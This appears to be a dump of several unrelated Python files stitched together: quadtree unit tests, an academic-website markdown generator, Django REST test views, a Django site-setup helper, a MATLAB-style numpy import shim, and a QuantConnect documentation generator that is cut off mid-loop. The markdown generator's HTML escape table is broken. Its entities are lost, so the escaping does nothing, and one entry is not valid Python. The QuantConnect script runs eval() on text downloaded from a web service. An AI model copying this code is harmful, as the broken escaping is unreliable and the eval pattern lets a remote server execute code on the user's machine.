quad1 = _tree.get_quadrant(ent1)
self.assertEqual(0, quad1)
ent2 = quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(600, 450)))
quad2 = _tree.get_quadrant(ent2)
self.assertEqual(1, quad2)
ent3 = quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(700, 950)))
quad3 = _tree.get_quadrant(ent3)
self.assertEqual(2, quad3)
ent4 = quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(0, 505)))
quad4 = _tree.get_quadrant(ent4)
self.assertEqual(3, quad4)
def test_get_quadrant_none(self):
_tree = quadtree.QuadTree(64, 5, self.big_rect)
ent1 = quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(497, 150)))
self.assertEqual(-1, _tree.get_quadrant(ent1))
ent2 = quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(800, 499)))
self.assertEqual(-1, _tree.get_quadrant(ent2))
ent3 = quadtree.QuadTreeEntity(rect2.Rect2(15, 15, vector2.Vector2(486, 505)))
self.assertEqual(-1, _tree.get_quadrant(ent3))
ent4 = quadtree.QuadTreeEntity(rect2.Rect2(5, 20, vector2.Vector2(15, 490)))
self.assertEqual(-1, _tree.get_quadrant(ent4))
ent5 = quadtree.QuadTreeEntity(rect2.Rect2(17, 34, vector2.Vector2(485, 470)))
self.assertEqual(-1, _tree.get_quadrant(ent5))
def test_get_quadrant_shifted(self):
_tree = quadtree.QuadTree(64, 5, self.big_rect_sub_3)
ent1 = quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(515, 600)))
self.assertEqual(0, _tree.get_quadrant(ent1))
ent2 = quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(800, 550)))
self.assertEqual(1, _tree.get_quadrant(ent2))
ent3 = quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(950, 850)))
self.assertEqual(2, _tree.get_quadrant(ent3))
ent4 = quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(515, 751)))
self.assertEqual(3, _tree.get_quadrant(ent4))
def test_get_quadrant_0_shifted(self):
_tree = quadtree.QuadTree(
64, 5, rect2.Rect2(500, 800, vector2.Vector2(200, 200))
)
ent1 = quadtree.QuadTreeEntity(rect2.Rect2(5, 10, vector2.Vector2(445, 224)))
self.assertEqual(-1, _tree.get_quadrant(ent1))
ent2 = quadtree.QuadTreeEntity(rect2.Rect2(11, 17, vector2.Vector2(515, 585)))
self.assertEqual(-1, _tree.get_quadrant(ent2))
ent3 = quadtree.QuadTreeEntity(rect2.Rect2(20, 20, vector2.Vector2(440, 700)))
self.assertEqual(-1, _tree.get_quadrant(ent3))
ent4 = quadtree.QuadTreeEntity(rect2.Rect2(15, 15, vector2.Vector2(215, 590)))
self.assertEqual(-1, _tree.get_quadrant(ent4))
ent5 = quadtree.QuadTreeEntity(rect2.Rect2(7, 12, vector2.Vector2(449, 589)))
self.assertEqual(-1, _tree.get_quadrant(ent5))
def test_split_empty(self):
_tree1 = quadtree.QuadTree(64, 5, self.big_rect)
self.assertIsNone(_tree1.children)
_tree1.split()
self.assertIsNotNone(_tree1.children)
self.assertEqual(4, len(_tree1.children))
self.assertEqual(500, _tree1.children[0].location.width)
self.assertEqual(500, _tree1.children[0].location.height)
self.assertEqual(0, _tree1.children[0].location.mincorner.x)
self.assertEqual(0, _tree1.children[0].location.mincorner.y)
self.assertEqual(1, _tree1.children[0].depth)
self.assertEqual(64, _tree1.children[0].bucket_size)
self.assertEqual(5, _tree1.children[0].max_depth)
self.assertEqual(500, _tree1.children[1].location.width)
self.assertEqual(500, _tree1.children[1].location.height)
self.assertEqual(500, _tree1.children[1].location.mincorner.x)
self.assertEqual(0, _tree1.children[1].location.mincorner.y)
self.assertEqual(500, _tree1.children[2].location.width)
self.assertEqual(500, _tree1.children[2].location.height)
self.assertEqual(500, _tree1.children[2].location.mincorner.x)
self.assertEqual(500, _tree1.children[2].location.mincorner.y)
self.assertEqual(500, _tree1.children[3].location.width)
self.assertEqual(500, _tree1.children[3].location.height)
self.assertEqual(0, _tree1.children[3].location.mincorner.x)
self.assertEqual(500, _tree1.children[3].location.mincorner.y)
# bottom-right
_tree2 = _tree1.children[2]
_tree2.split()
self.assertEqual(250, _tree2.children[0].location.width)
self.assertEqual(250, _tree2.children[0].location.height)
self.assertEqual(500, _tree2.children[0].location.mincorner.x)
self.assertEqual(500, _tree2.children[0].location.mincorner.y)
self.assertEqual(2, _tree2.children[0].depth)
self.assertEqual(250, _tree2.children[1].location.width)
self.assertEqual(250, _tree2.children[1].location.height)
self.assertEqual(750, _tree2.children[1].location.mincorner.x)
self.assertEqual(500, _tree2.children[1].location.mincorner.y)
self.assertEqual(250, _tree2.children[2].location.width)
self.assertEqual(250, _tree2.children[2].location.height)
self.assertEqual(750, _tree2.children[2].location.mincorner.x)
self.assertEqual(750, _tree2.children[2].location.mincorner.y)
self.assertEqual(250, _tree2.children[3].location.width)
self.assertEqual(250, _tree2.children[3].location.height)
self.assertEqual(500, _tree2.children[3].location.mincorner.x)
self.assertEqual(750, _tree2.children[3].location.mincorner.y)
def test_split_entities(self):
ent1 = quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(50, 50)))
ent2 = quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(550, 75)))
ent3 = quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(565, 585)))
ent4 = quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(95, 900)))
ent5 = quadtree.QuadTreeEntity(rect2.Rect2(10, 10, vector2.Vector2(495, 167)))
_tree = quadtree.QuadTree(
64, 5, self.big_rect, entities=[ent1, ent2, ent3, ent4, ent5]
)
_tree.split()
self.assertEqual(1, len(_tree.children[0].entities))
self.assertEqual(50, _tree.children[0].entities[0].aabb.mincorner.x)
self.assertEqual(50, _tree.children[0].entities[0].aabb.mincorner.y)
self.assertEqual(1, len(_tree.children[1].entities))
self.assertEqual(550, _tree.children[1].entities[0].aabb.mincorner.x)
self.assertEqual(75, _tree.children[1].entities[0].aabb.mincorner.y)
self.assertEqual(1, len(_tree.children[2].entities))
self.assertEqual(565, _tree.children[2].entities[0].aabb.mincorner.x)
self.assertEqual(585, _tree.children[2].entities[0].aabb.mincorner.y)
self.assertEqual(1, len(_tree.children[3].entities))
self.assertEqual(95, _tree.children[3].entities[0].aabb.mincorner.x)
self.assertEqual(900, _tree.children[3].entities[0].aabb.mincorner.y)
self.assertEqual(1, len(_tree.entities))
self.assertEqual(495, _tree.entities[0].aabb.mincorner.x)
self.assertEqual(167, _tree.entities[0].aabb.mincorner.y)
_tree2 = _tree.children[3]
_tree2.split()
for i in range(3):
self.assertEqual(0, len(_tree2.children[i].entities), msg="i={}".format(i))
self.assertEqual(1, len(_tree2.children[3].entities))
self.assertEqual(95, _tree2.children[3].entities[0].aabb.mincorner.x)
self.assertEqual(900, _tree2.children[3].entities[0].aabb.mincorner.y)
# note for test_think and test_insert we're testing the worst-case scenario
# for a quad tree (everythings all bunched up in a corner) hence the instant
# flow to max depth. this case is why max_depth is necessary. To see why you
# don't need that much max_depth, the rect sizes are
# 1000 (depth 0), 500 (depth 1), 250 (depth 2), 125 (depth 3), 62.5 (depth 4),
# 31.25 (depth 5), 15.625 (depth 6), etc. As you can see, they would have to be
# extremely bunched (or stacked) and tiny to actually cause a stack overflow (in the
# examples it's only 6 deep), but the quadtree isn't improving anything
# (even at 1000x1000 world!) past depth 5 or so.
def test_think(self):
ent1 = quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(15, 15)))
ent2 = quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(20, 20)))
ent3 = quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(0, 0)))
ent4 = quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(5, 0)))
ent5 = quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(0, 5)))
_tree = quadtree.QuadTree(
2, 2, self.big_rect, entities=[ent1, ent2, ent3, ent4, ent5]
)
_tree.think(True)
self.assertIsNotNone(_tree.children) # depth 1
self.assertIsNotNone(_tree.children[0].children) # depth 2
self.assertIsNone(
_tree.children[0].children[0].children
) # depth 3 shouldn't happen because
self.assertEqual(
5, len(_tree.children[0].children[0].entities)
) # max_depth reached
_tree2 = quadtree.QuadTree(2, 2, self.big_rect, entities=[ent1, ent2])
_tree2.think(True)
self.assertIsNone(_tree2.children)
def test_insert(self):
_tree = quadtree.QuadTree(2, 2, self.big_rect)
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(15, 15)))
)
self.assertIsNone(_tree.children)
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(20, 20)))
)
self.assertIsNone(_tree.children)
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(0, 0)))
)
self.assertIsNotNone(_tree.children) # depth 1
self.assertIsNotNone(_tree.children[0].children) # depth 2
self.assertIsNone(
_tree.children[0].children[0].children
) # depth 3 shouldn't happen because
self.assertEqual(
3, len(_tree.children[0].children[0].entities)
) # max_depth reached
def test_retrieve(self):
_tree = quadtree.QuadTree(2, 2, self.big_rect)
ent1 = quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(25, 25)))
_tree.insert_and_think(ent1)
retr = _tree.retrieve_collidables(ent1)
self.assertIsNotNone(retr)
self.assertEqual(1, len(retr))
self.assertEqual(25, retr[0].aabb.mincorner.x)
self.assertEqual(25, retr[0].aabb.mincorner.y)
# note this is not nicely in a quadrant
ent2 = quadtree.QuadTreeEntity(rect2.Rect2(20, 10, vector2.Vector2(490, 300)))
_tree.insert_and_think(ent2)
retr = _tree.retrieve_collidables(ent1)
self.assertIsNotNone(retr)
self.assertEqual(
2, len(retr)
) # both ent1 and ent2 are "collidable" in this quad tree
# this should cause a split (bucket_size)
ent3 = quadtree.QuadTreeEntity(rect2.Rect2(15, 10, vector2.Vector2(700, 450)))
_tree.insert_and_think(ent3)
ent4 = quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(900, 900)))
_tree.insert_and_think(ent4)
# ent1 should collide with ent1 or ent2
# ent2 with ent1 or ent2, or ent3
# ent3 with ent2 or ent3
# ent4 with ent2 or ent4
retr = _tree.retrieve_collidables(ent1)
self.assertIsNotNone(retr)
self.assertEqual(2, len(retr))
self.assertIsNotNone(
next((e for e in retr if e.aabb.mincorner.x == 25), None), str(retr)
)
self.assertIsNotNone(
next((e for e in retr if e.aabb.mincorner.x == 490), None), str(retr)
)
retr = _tree.retrieve_collidables(ent2)
self.assertEqual(3, len(retr))
self.assertIsNotNone(
next((e for e in retr if e.aabb.mincorner.x == 25), None), str(retr)
)
self.assertIsNotNone(
next((e for e in retr if e.aabb.mincorner.x == 490), None), str(retr)
)
self.assertIsNotNone(
next((e for e in retr if e.aabb.mincorner.x == 700), None), str(retr)
)
retr = _tree.retrieve_collidables(ent3)
self.assertEqual(2, len(retr))
self.assertIsNotNone(
next((e for e in retr if e.aabb.mincorner.x == 490), None), str(retr)
)
self.assertIsNotNone(
next((e for e in retr if e.aabb.mincorner.x == 700), None), str(retr)
)
retr = _tree.retrieve_collidables(ent4)
self.assertEqual(2, len(retr))
self.assertIsNotNone(
next((e for e in retr if e.aabb.mincorner.x == 900), None), str(retr)
)
self.assertIsNotNone(
next((e for e in retr if e.aabb.mincorner.x == 490), None), str(retr)
)
def test_ents_per_depth(self):
_tree = quadtree.QuadTree(3, 5, self.big_rect)
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(75, 35)))
)
self.assertDictEqual({0: 1}, _tree.find_entities_per_depth())
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(300, 499)))
)
self.assertDictEqual({0: 2}, _tree.find_entities_per_depth())
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(800, 600)))
)
self.assertDictEqual({0: 3}, _tree.find_entities_per_depth())
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(450, 300)))
)
self.assertDictEqual({0: 1, 1: 3}, _tree.find_entities_per_depth())
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(150, 100)))
)
self.assertDictEqual({0: 1, 1: 4}, _tree.find_entities_per_depth())
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(80, 40)))
)
self.assertDictEqual({0: 1, 1: 1, 2: 4}, _tree.find_entities_per_depth())
def test_nodes_per_depth(self):
_tree = quadtree.QuadTree(1, 5, self.big_rect)
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(50, 50)))
)
self.assertDictEqual({0: 1}, _tree.find_nodes_per_depth())
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(450, 450)))
)
self.assertDictEqual({0: 1, 1: 4, 2: 4}, _tree.find_nodes_per_depth())
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(550, 550)))
)
self.assertDictEqual({0: 1, 1: 4, 2: 4}, _tree.find_nodes_per_depth())
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(850, 550)))
)
self.assertDictEqual({0: 1, 1: 4, 2: 8}, _tree.find_nodes_per_depth())
def test_sum_ents(self):
# it shouldn't matter where we put entities in, adding entities
# to a quadtree should increment this number by 1. So lets fuzz!
_tree = quadtree.QuadTree(64, 5, self.big_rect)
for i in range(1000):
w = random.randrange(1, 10)
h = random.randrange(1, 10)
x = random.uniform(0, 1000 - w)
y = random.uniform(0, 1000 - h)
ent = quadtree.QuadTreeEntity(rect2.Rect2(w, h, vector2.Vector2(x, y)))
_tree.insert_and_think(ent)
# avoid calculating sum every loop which would take way too long.
# on average, try to sum about 50 times total (5% of the time),
# evenly split between both ways of summing
rnd = random.random()
if rnd > 0.95 and rnd <= 0.975:
_sum = _tree.sum_entities()
self.assertEqual(i + 1, _sum)
elif rnd > 0.975:
_sum = _tree.sum_entities(_tree.find_entities_per_depth())
self.assertEqual(i + 1, _sum)
def test_avg_ents_per_leaf(self):
_tree = quadtree.QuadTree(3, 5, self.big_rect)
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(75, 35)))
)
self.assertEqual(1, _tree.calculate_avg_ents_per_leaf()) # 1 ent on 1 leaf
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(300, 499)))
)
self.assertEqual(2, _tree.calculate_avg_ents_per_leaf()) # 2 ents 1 leaf
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(800, 600)))
)
self.assertEqual(3, _tree.calculate_avg_ents_per_leaf()) # 3 ents 1 leaf
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(450, 300)))
)
self.assertEqual(
0.75, _tree.calculate_avg_ents_per_leaf()
) # 3 ents 4 leafs (1 misplaced)
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(150, 100)))
)
self.assertEqual(
1, _tree.calculate_avg_ents_per_leaf()
) # 4 ents 4 leafs (1 misplaced)
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(450, 450)))
)
self.assertAlmostEqual(
5 / 7, _tree.calculate_avg_ents_per_leaf()
) # 5 ents 7 leafs (1 misplaced)
def test_misplaced_ents(self):
_tree = quadtree.QuadTree(3, 5, self.big_rect)
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(75, 35)))
)
self.assertEqual(
0, _tree.calculate_weight_misplaced_ents()
) # 0 misplaced, 1 total
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(300, 499)))
)
self.assertEqual(
0, _tree.calculate_weight_misplaced_ents()
) # 0 misplaced, 2 total
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(800, 600)))
)
self.assertEqual(
0, _tree.calculate_weight_misplaced_ents()
) # 0 misplaced 3 total
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(550, 700)))
)
self.assertAlmostEqual(
1, _tree.calculate_weight_misplaced_ents()
) # 1 misplaced (1 deep), 4 total
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(900, 900)))
)
self.assertAlmostEqual(
4 / 5, _tree.calculate_weight_misplaced_ents()
) # 1 misplaced (1 deep), 5 total
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(950, 950)))
)
self.assertAlmostEqual(
8 / 6, _tree.calculate_weight_misplaced_ents()
) # 1 misplaced (2 deep), 6 total
def test_repr(self):
_tree = quadtree.QuadTree(1, 5, rect2.Rect2(100, 100))
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(2, 2, vector2.Vector2(5, 5)))
)
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(2, 2, vector2.Vector2(95, 5)))
)
_olddiff = self.maxDiff
def cleanup(self2=self):
self2.maxDiff = _olddiff
self.addCleanup(cleanup)
self.maxDiff = None
self.assertEqual(
"quadtree(bucket_size=1, max_depth=5, location=rect2(width=100, height=100, mincorner=vector2(x=0, y=0)), depth=0, entities=[], children=[quadtree(bucket_size=1, max_depth=5, location=rect2(width=50.0, height=50.0, mincorner=vector2(x=0, y=0)), depth=1, entities=[quadtreeentity(aabb=rect2(width=2, height=2, mincorner=vector2(x=5, y=5)))], children=None), quadtree(bucket_size=1, max_depth=5, location=rect2(width=50.0, height=50.0, mincorner=vector2(x=50.0, y=0)), depth=1, entities=[quadtreeentity(aabb=rect2(width=2, height=2, mincorner=vector2(x=95, y=5)))], children=None), quadtree(bucket_size=1, max_depth=5, location=rect2(width=50.0, height=50.0, mincorner=vector2(x=50.0, y=50.0)), depth=1, entities=[], children=None), quadtree(bucket_size=1, max_depth=5, location=rect2(width=50.0, height=50.0, mincorner=vector2(x=0, y=50.0)), depth=1, entities=[], children=None)])",
repr(_tree),
)
def test_str(self):
_tree = quadtree.QuadTree(1, 5, rect2.Rect2(100, 100))
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(2, 2, vector2.Vector2(5, 5)))
)
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(2, 2, vector2.Vector2(95, 5)))
)
_olddiff = self.maxDiff
def cleanup(self2=self):
self2.maxDiff = _olddiff
self.addCleanup(cleanup)
self.maxDiff = None
self.assertEqual(
"quadtree(at rect(100x100 at <0, 0>) with 0 entities here (2 in total); (nodes, entities) per depth: [ 0: (1, 0), 1: (4, 2) ] (allowed max depth: 5, actual: 1), avg ent/leaf: 0.5 (target 1), misplaced weight 0.0 (0 best, >1 bad)",
str(_tree),
)
if __name__ == "__main__":
unittest.main()
|
python
|
# coding: utf-8
# # Projects markdown generator for academicpages
#
# Takes a TSV of projects with metadata and converts them for use with [academicpages.github.io](academicpages.github.io). This is an interactive Jupyter notebook, with the core python code in projects.py. Run either from the `markdown_generator` folder after replacing `projects.tsv` with one that fits your format.
#
# TODO: Make this work with BibTex and other databases of citations, rather than Stuart's non-standard TSV format and citation style.
#
# ## Data format
#
# The TSV needs to have the following columns: pub_date, title, venue, excerpt, citation, site_url, and paper_url, with a header at the top.
#
# - `excerpt` and `paper_url` can be blank, but the others must have values.
# - `pub_date` must be formatted as YYYY-MM-DD.
# - `url_slug` will be the descriptive part of the .md file and the permalink URL for the page about the paper. The .md file will be `YYYY-MM-DD-[url_slug].md` and the permalink will be `https://[yourdomain]/projects/YYYY-MM-DD-[url_slug]`
# ## Import pandas
#
# We are using the very handy pandas library for dataframes.
# In[2]:
import pandas as pd
# ## Import TSV
#
# Pandas makes this easy with the read_csv function. We are using a TSV, so we specify the separator as a tab, or `\t`.
#
# I found it important to put this data in a tab-separated values format, because there are a lot of commas in this kind of data and comma-separated values can get messed up. However, you can modify the import statement, as pandas also has read_excel(), read_json(), and others.
# In[3]:
projects = pd.read_csv("projects.tsv", sep="\t", header=0)
projects
# ## Escape special characters
#
# YAML is very picky about how it takes a valid string, so we are replacing single and double quotes (and ampersands) with their HTML encoded equivilents. This makes them look not so readable in raw format, but they are parsed and rendered nicely.
# In[4]:
html_escape_table = {
"&": "&",
'"': """,
"'": "'"
}
def html_escape(text):
"""Produce entities within text."""
return "".join(html_escape_table.get(c,c) for c in text)
# ## Creating the markdown files
#
# This is where the heavy lifting is done. This loops through all the rows in the TSV dataframe, then starts to concatentate a big string (```md```) that contains the markdown for each type. It does the YAML metadata first, then does the description for the individual page. If you don't want something to appear (like the "Recommended citation")
# In[5]:
import os
for row, item in projects.iterrows():
md_filename = str(item.pub_date) + "-" + item.url_slug + ".md"
html_filename = str(item.pub_date) + "-" + item.url_slug
year = item.pub_date[:4]
## YAML variables
md = "---\ntitle: \"" + item.title + '"\n'
md += """collection: projects"""
md += """\npermalink: /project/""" + html_filename
if len(str(item.excerpt)) > 5:
md += "\nexcerpt: '" + html_escape(item.excerpt) + "'"
if len(str(item.location)) > 3:
md += "date: " + str(item.date) + "\n"
md += "\n---"
## Markdown description for individual project
if len(str(item.description)) > 3:
md += "\n" + html_escape(item.description) + "\n"
if len(str(item.excerpt)) > 5:
md += "\n" + html_escape(item.excerpt) + "\n"
md_filename = os.path.basename(md_filename)
with open("../projects/" + md_filename, 'w') as f:
f.write(md)
|
python
|
from six.moves.urllib.parse import urljoin
from django_filters.rest_framework import DjangoFilterBackend
from rest_framework.views import APIView
from rest_framework.viewsets import ReadOnlyModelViewSet, ModelViewSet
from rest_framework.response import Response
from rest_framework import status
from rest_framework.exceptions import ParseError
from collectionjson.renderers import CollectionJsonRenderer
from collectionjson.parsers import CollectionJsonParser
from .models import Dummy, Idiot, Moron, MoronFilter, Simple
from .serializers import MoronHyperlinkedModelSerializer, IdiotHyperlinkedModelSerializer
from .serializers import DummyHyperlinkedModelSerializer, SimpleModelSerializer
class MoronModelViewSet(ModelViewSet):
renderer_classes = (CollectionJsonRenderer, )
parser_classes = (CollectionJsonParser, )
queryset = Moron.objects.all()
serializer_class = MoronHyperlinkedModelSerializer
filter_backends = (DjangoFilterBackend,)
filterset_class = MoronFilter
class MoronReadOnlyModelViewSet(ReadOnlyModelViewSet):
renderer_classes = (CollectionJsonRenderer, )
queryset = Moron.objects.all()
serializer_class = MoronHyperlinkedModelSerializer
class IdiotReadOnlyModelViewSet(ReadOnlyModelViewSet):
renderer_classes = (CollectionJsonRenderer, )
queryset = Idiot.objects.all()
serializer_class = IdiotHyperlinkedModelSerializer
class DummyReadOnlyModelViewSet(ReadOnlyModelViewSet):
renderer_classes = (CollectionJsonRenderer, )
queryset = Dummy.objects.all()
serializer_class = DummyHyperlinkedModelSerializer
class SimpleViewSet(ReadOnlyModelViewSet):
renderer_classes = (CollectionJsonRenderer, )
queryset = Simple.objects.all()
serializer_class = SimpleModelSerializer
class NoSerializerView(APIView):
renderer_classes = (CollectionJsonRenderer, )
def get(self, request):
return Response({'foo': '1'})
class PaginatedDataView(APIView):
renderer_classes = (CollectionJsonRenderer, )
def get(self, request):
return Response({
'next': 'http://test.com/colleciton/next',
'previous': 'http://test.com/colleciton/previous',
'results': [{'foo': 1}],
})
class NonePaginatedDataView(APIView):
renderer_classes = (CollectionJsonRenderer, )
def get(self, request):
return Response({
'next': None,
'previous': None,
'results': [{'foo': 1}],
})
class ParseErrorView(APIView):
renderer_classes = (CollectionJsonRenderer, )
def get(self, request):
raise ParseError('lol nice one')
class UrlRewriteRenderer(CollectionJsonRenderer):
def get_href(self, request):
return urljoin('http://rewritten.com', request.path)
class UrlRewriteView(APIView):
renderer_classes = (UrlRewriteRenderer, )
def get(self, request):
return Response({'foo': 'bar'})
class EmptyView(APIView):
renderer_classes = (CollectionJsonRenderer, )
def get(self, request):
return Response(status=status.HTTP_204_NO_CONTENT)
|
python
|
import click
from django.conf import settings
from django.contrib.sites.models import Site
def setup_current_site(site_name=None, domain=None):
'''
Sets up the user with the current site.
'''
site_id = settings.SITE_ID
click.secho('\nA site has not been configured for this CMS. Please answer the questions below.', fg='yellow')
if not (site_name or domain):
domain = click.prompt('Please enter the domain you are registering the site for: (i.e.: mysite.com): ', type=str, default='mysite.com')
site_name = click.prompt('What is the name of your site? (i.e.: MySite DEV): ', type=str, default='MySite DEV')
site = Site.objects.create(id=site_id, domain=domain, name=site_name)
return site
def get_current_site():
'''
Gets the current site information.
'''
if not hasattr(settings, 'SITE_ID'):
msg = '\nYou need to define SITE_ID in your settings. More information: https://docs.djangoproject.com/en/2.0/ref/settings/#std:setting-SITE_ID'
click.secho(msg, fg='red')
raise ValueError(msg)
try:
site_id = settings.SITE_ID
site = Site.objects.get(id=site_id)
return site
except Site.DoesNotExist:
click.secho("Please setup your site by calling 'python manage.py setup_cms' before continuing.", fg='red')
return None
def get_current_site_id():
'''
Gets the current site id.
'''
site = get_current_site()
return site.id if site else None
|
python
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2018/10/12 17:00
# @Author : Iydon
# @File : matlab.py
# `matlab -nodesktop' -> `from matlab import *'
# tic, toc, disp
import time
def tic(): globals()['TIC+TIME'] = time.time()
toc = lambda :time.time()-globals()['TIC+TIME']
disp = print
tic()
# numpy
import numpy
# function from numpy about operators
from numpy import sin, cos, tan, arcsin as asin, arccos as acos, arctan as atan, sinc
from numpy import sinh, cosh, tanh, arcsinh as asinh, arccosh as acosh, arctanh as atanh
from numpy import power, exp, log, log2, log10, log1p, sqrt
from numpy import real, imag
# function from numpy about value
from numpy import linspace, logspace
from numpy import rad2deg, deg2rad, sign, conj
from numpy import prod, cumprod, cumsum, sum, mean, std, min, max, var, cov, sort, mod
from numpy import round, floor, ceil, fix
from numpy import nansum, nanmax, nanmin, nanstd, nanvar
# function from numpy about random
from numpy.random import rand, randn, randint as randi, permutation as randperm
# function from numpy about fft
from numpy.fft import fft, fft2, fftn, fftshift, ifft, ifft2, ifftn, ifftshift
# function from numpy about logical
from numpy import all, any, isinf, isnan
from numpy import logical_and as and_, logical_not as not_, logical_or as or_, logical_xor as xor_
# function from numpy about polynomial
from numpy import poly, roots, polyint, polyder, polyval, polyfit
# function from numpy about matrix
from numpy import matrix, array
from numpy import size, rot90, flip, fliplr, flipud, reshape
from numpy import hstack as horzcat, vstack as vertcat, tile as repmat
from numpy import diag, zeros, ones, eye, char
# function from numpy about matrix calculation
from numpy.linalg import det, solve, inv, pinv, det, svd, eig, norm, qr, cond
from numpy.linalg import matrix_rank as rank, cholesky as chol
# constant from numpy or by numpy
from numpy import pi, inf, Inf, nan, NaN
i = j = numpy.complex(0, 1)
# auxiliary function from numpy
from numpy import who, lookfor, save
# attributes of array and matrix:
# array.T=>{array'}; array.flatten=>{array(:)}
# image function from numpy
from numpy import meshgrid
# scipy
import scipy
# function from numpy about matrix calculation
from scipy.linalg import lu, sqrtm
# matplotlib
import matplotlib
# plot 2D
from matplotlib.pyplot import plot, scatter, bar, barh, contourf, contour, pie, hist, spy, polar
from matplotlib.pyplot import imshow
# current figure
from matplotlib.pyplot import gca, gcf, figure, subplot
# axis ang text
from matplotlib.pyplot import axis, show, xlim, ylim, xticks, yticks, legend, grid
from matplotlib.pyplot import annotate as text, cm as colormap
# auxiliary param
from matplotlib.pyplot import savefig
# pyplot, mplot3d
from mpl_toolkits.mplot3d import Axes3D
"""
t = linspace(-1, 1, 10)
X,Y = meshgrid(t, t)
Z = sin(X*Y)
fig = figure()
axs = Axes3D(fig)
axs.plot_surface(X,Y,Z)
show()
"""
"""
# sympy
import sympy # from sympy import *
# function from sympy about operators
from sympy import symbols as sym
from sympy import sin, cos, tan, asin, acos, atan, sinh, cosh, tanh, asinh, acosh, atanh
from sympy import exp, log
"""
disp("Elapsed time is %.6f seconds."%toc())
|
python
|
import base64
import numpy as np
import os
import pathlib
import re
import shutil
from urllib.request import urlopen
raw = urlopen("https://www.quantconnect.com/services/inspector?type=T:QuantConnect.Algorithm.QCAlgorithm").read().decode("utf-8") \
.replace("true", "True") \
.replace("false", "False") \
.replace("null", "None")
raw_dict = eval(raw)
methods = raw_dict["methods"]
methods = [method for method in methods if 'QuantConnect.Indicators' in str(method["method-return-type-full-name"]) \
and str(method["method-return-type-short-name"]) != 'IndicatorBase<IndicatorDataPoint>']
raw_candle = urlopen("https://www.quantconnect.com/services/inspector?type=T:QuantConnect.Algorithm.CandlestickPatterns").read().decode("utf-8") \
.replace("true", "True") \
.replace("false", "False") \
.replace("null", "None")
raw_candle_dict = eval(raw_candle)
methods_candle = raw_candle_dict["methods"]
candle = [str(method["method-return-type-short-name"]) for method in methods_candle]
methods += methods_candle
names = {}
descriptions = {}
args = {}
plots = {}
updates = {}
update_value = {}
full_apis = {}
root = '02 Writing Algorithms/28 Indicators/07 Indicator Reference'
if os.path.isdir(root):
shutil.rmtree(root)
for method in methods:
item = str(method["method-return-type-short-name"])
names[item] = str(method["method-name"])
args[item] = tuple(x["argument-name"] for x in method["method-arguments"] if not x["argument-optional"])
plots[item] = []
if item not in candle:
